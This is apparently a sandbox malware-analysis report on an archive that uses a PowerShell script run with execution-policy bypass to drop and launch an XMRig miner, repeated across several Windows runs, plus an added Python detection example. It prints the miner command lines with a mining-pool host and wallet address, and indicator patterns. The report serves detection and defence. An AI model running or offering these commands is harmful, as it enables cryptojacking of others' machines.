Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-04 03:15
Signatures
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:51
Platform
win11-20240611-en
Max time kernel
1791s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
64 matches recorded; the report gives no Description, Indicator, Process or Target for any of them.
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3672 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3672 wrote to memory of 4796 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.28.10:443 | tse1.mm.bing.net | tcp |
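The detection-relevant parts of this run are the Processes and Network tables above: powershell.exe started with `-ExecutionPolicy bypass -File` on a script under the user's Temp directory, that PowerShell process (PID 3672) spawning xmrig.exe (PID 4796) from the same Temp tree with a pool endpoint (`-o gulf.moneroocean.stream:10128`) and a Monero wallet (`-u 45aH...`), and the matching outbound connection to 149.102.143.109:10128. The Python below is an added example, not part of the sandbox output, that turns those indicators into checks over process-creation and connection records. The record shapes are assumed; the sample events are constructed to mirror this run, the benign notepad.exe event and the parent PID 1234 are made up for contrast, and the only hash the example knows is the xmrig.exe SHA-256 from the Files section.

```python
"""Detection logic for the PowerShell -> XMRig chain seen in this report.

Added example, not sandbox output. Sample records below are constructed
to mirror the behavioral8 run (PID 3672 powershell.exe -> PID 4796 xmrig.exe).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Monero standard address (4...) or subaddress (8...): 95 base58 characters,
# base58 meaning no 0, O, I or l. Lookarounds stop partial matches.
MONERO_ADDR = re.compile(
    r"(?<![1-9A-HJ-NP-Za-km-z])[48][1-9A-HJ-NP-Za-km-z]{94}(?![1-9A-HJ-NP-Za-km-z])"
)
# XMRig pool argument: "-o host:port" or "--url=host:port", optional stratum scheme.
POOL_ARG = re.compile(
    r"(?:^|\s)(?:-o|--url)[=\s]+(?:stratum\+(?:tcp|ssl)://)?([A-Za-z0-9.-]+):(\d{1,5})"
)
TEMP_DIR = "\\appdata\\local\\temp\\"  # user-writable drop location in this report

# SHA-256 of the dropped xmrig.exe, taken from the Files section of this report.
KNOWN_BAD_SHA256 = {
    "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda": "xmrig-6.21.3\\xmrig.exe",
}


@dataclass
class ProcEvent:  # assumed shape of a process-creation record
    pid: int
    ppid: int
    image: str
    cmdline: str
    sha256: str = ""


@dataclass
class Finding:
    pid: int
    rule: str
    detail: str


def analyze(events: List[ProcEvent]) -> List[Finding]:
    """Run the four host-side rules over a batch of process-creation records."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        img = e.image.lower()
        low = e.cmdline.lower()

        # 1. powershell.exe -ExecutionPolicy bypass -File <script under %TEMP%>
        if (img.endswith("powershell.exe") and "-executionpolicy" in low
                and "bypass" in low and "-file" in low and TEMP_DIR in low):
            findings.append(Finding(e.pid, "ps_bypass_temp_script", e.cmdline))

        # 2. Miner command line: a pool host:port together with a Monero wallet.
        pool = POOL_ARG.search(e.cmdline)
        addr = MONERO_ADDR.search(e.cmdline)
        if pool and addr:
            host, port = pool.groups()
            findings.append(Finding(e.pid, "xmrig_cmdline",
                                    f"pool={host}:{port} wallet={addr.group(0)[:8]}..."))

        # 3. Executable whose hash is on the known-bad list.
        if e.sha256.lower() in KNOWN_BAD_SHA256:
            findings.append(Finding(e.pid, "known_bad_hash", KNOWN_BAD_SHA256[e.sha256.lower()]))

        # 4. PowerShell parent launching an executable out of %TEMP%.
        parent = by_pid.get(e.ppid)
        if parent and parent.image.lower().endswith("powershell.exe") and TEMP_DIR in img:
            findings.append(Finding(e.pid, "powershell_spawns_temp_exe", f"parent pid {parent.pid}"))
    return findings


def rules_by_pid(events: List[ProcEvent]) -> Dict[int, Set[str]]:
    out: Dict[int, Set[str]] = {}
    for f in analyze(events):
        out.setdefault(f.pid, set()).add(f.rule)
    return out


def pool_endpoints(events: List[ProcEvent]) -> Set[Tuple[str, int]]:
    """Pool (host, port) pairs pulled from miner command lines."""
    out: Set[Tuple[str, int]] = set()
    for e in events:
        m = POOL_ARG.search(e.cmdline)
        if m:
            out.add((m.group(1).lower(), int(m.group(2))))
    return out


def flag_connections(conns: List[Tuple[str, str, int]],
                     pools: Set[Tuple[str, int]]) -> List[Tuple[str, str, int]]:
    """conns are (domain, ip, port); keep those that hit a pool endpoint from a command line."""
    return [c for c in conns if (c[0].lower(), c[2]) in pools]


# Constructed sample input mirroring the Processes and Network tables of behavioral8.
SAMPLE_EVENTS = [
    ProcEvent(3672, 1234, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"'),
    ProcEvent(4796, 3672, r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 '
              r"-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF",
              sha256="2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"),
    ProcEvent(5000, 1234, r"C:\Windows\System32\notepad.exe", "notepad.exe"),  # benign, for contrast
]
SAMPLE_CONNS = [
    ("github.com", "20.26.156.215", 443),
    ("objects.githubusercontent.com", "185.199.108.133", 443),
    ("gulf.moneroocean.stream", "149.102.143.109", 10128),
    ("tse1.mm.bing.net", "150.171.28.10", 443),
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule} ({f.detail})")
    print("pool traffic:", flag_connections(SAMPLE_CONNS, pool_endpoints(SAMPLE_EVENTS)))
```

`-ExecutionPolicy bypass` on its own is common in legitimate administration, so rule 1 also requires the script to sit under a user-writable Temp path, and rule 4 ties the dropped executable to its PowerShell parent, which is the same parent/child pair the WriteProcessMemory rows record. Matching the pool endpoint parsed from the command line against real connections is what confirms the miner went live, as in the 149.102.143.109:10128 row above. The github.com and objects.githubusercontent.com connections that precede it are consistent with the script fetching the xmrig 6.21.3 release archive (the dropped path is xmrig-6.21.3\xmrig.exe), but the report does not show the download URL, so the example does not key on them. The SeLockMemoryPrivilege rows are XMRig enabling large pages and make a useful secondary signal, not used here.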
Files
memory/3672-0-0x00007FFCC4293000-0x00007FFCC4295000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i41gprcg.j2u.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3672-9-0x00000286AD0F0000-0x00000286AD112000-memory.dmp
memory/3672-10-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/3672-11-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/3672-12-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/3672-14-0x00000286C5B50000-0x00000286C5B62000-memory.dmp
memory/3672-15-0x00000286C5A40000-0x00000286C5A4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4796-46-0x00000232A7F20000-0x00000232A7F40000-memory.dmp
memory/4796-47-0x00000232A7F70000-0x00000232A7F90000-memory.dmp
memory/4796-48-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/3672-49-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/4796-52-0x00000232A7FB0000-0x00000232A7FD0000-memory.dmp
memory/4796-51-0x00000232A7F90000-0x00000232A7FB0000-memory.dmp
memory/4796-50-0x00007FF633E70000-0x00007FF634AA3000-memory.dmp
memory/3672-53-0x00007FFCC4293000-0x00007FFCC4295000-memory.dmp
memory/3672-54-0x00007FFCC4290000-0x00007FFCC4D52000-memory.dmp
memory/4796-55 through memory/4796-117 (63 dumps): 0x00007FF633E70000-0x00007FF634AA3000 (the same region of process 4796, xmrig.exe, dumped repeatedly)
Analysis: behavioral16
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win11-20240611-en
Max time kernel
1791s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
64 matches recorded; the report gives no Description, Indicator, Process or Target for any of them.
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4744 wrote to memory of 2916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4744 wrote to memory of 2916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4744-0-0x00007FFC00583000-0x00007FFC00585000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lptlkqjq.bqy.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4744-6-0x00000144F0120000-0x00000144F0142000-memory.dmp
memory/4744-10-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/4744-11-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/4744-12-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/4744-14-0x00000144F01B0000-0x00000144F01C2000-memory.dmp
memory/4744-15-0x00000144F01A0000-0x00000144F01AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2916-46-0x0000023C112B0000-0x0000023C112D0000-memory.dmp
memory/2916-47-0x0000023C12AB0000-0x0000023C12AD0000-memory.dmp
memory/2916-48-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/4744-49-0x00007FFC00583000-0x00007FFC00585000-memory.dmp
memory/4744-50-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/2916-51-0x0000023C12AD0000-0x0000023C12AF0000-memory.dmp
memory/2916-52-0x0000023C12AF0000-0x0000023C12B10000-memory.dmp
memory/4744-54-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/2916-53-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/4744-55-0x00007FFC00580000-0x00007FFC01042000-memory.dmp
memory/2916-56-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-57-0x00007FF6F3620000-0x00007FF6F4253000-memory.dmp
memory/2916-58-0x0000023C12AD0000-0x0000023C12AF0000-memory.dmp
memory/2916-59-0x0000023C12AF0000-0x0000023C12B10000-memory.dmp
memory/2916-60 through memory/2916-118 (59 dumps): 0x00007FF6F3620000-0x00007FF6F4253000 (the same region of process 2916, xmrig.exe, dumped repeatedly)
Analysis: behavioral20
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1782s
Command Line
Signatures
XMRig Miner payload
64 matches recorded; the report gives no Description, Indicator, Process or Target for any of them.
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2180 wrote to memory of 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2180 wrote to memory of 3500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2180-0-0x00007FFE06133000-0x00007FFE06135000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5xydlrv5.r2q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2180-9-0x00000288D3950000-0x00000288D3972000-memory.dmp
memory/2180-10-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/2180-11-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/2180-12-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/2180-14-0x00000288D3E60000-0x00000288D3E72000-memory.dmp
memory/2180-15-0x00000288D3B30000-0x00000288D3B3A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3500-46-0x000001D7A2FD0000-0x000001D7A2FF0000-memory.dmp
memory/3500-47-0x000001D7A3010000-0x000001D7A3030000-memory.dmp
memory/3500-48-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/2180-49-0x00007FFE06133000-0x00007FFE06135000-memory.dmp
memory/3500-52-0x000001D7A3050000-0x000001D7A3070000-memory.dmp
memory/3500-51-0x000001D7A3030000-0x000001D7A3050000-memory.dmp
memory/2180-50-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/3500-53-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-54-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-55-0x00007FF734930000-0x00007FF735563000-memory.dmp
memory/3500-56-0x000001D7A3030000-0x000001D7A3050000-memory.dmp
memory/3500-57-0x000001D7A3050000-0x000001D7A3070000-memory.dmp
memory/3500-58 through memory/3500-116 (59 dumps): 0x00007FF734930000-0x00007FF735563000 (the same region of process 3500, xmrig.exe, dumped repeatedly)
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:42
Platform
win10v2004-20240508-en
Max time kernel
1788s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1916 wrote to memory of 2996 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1916 wrote to memory of 2996 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zz142yi1.vix.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral11
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
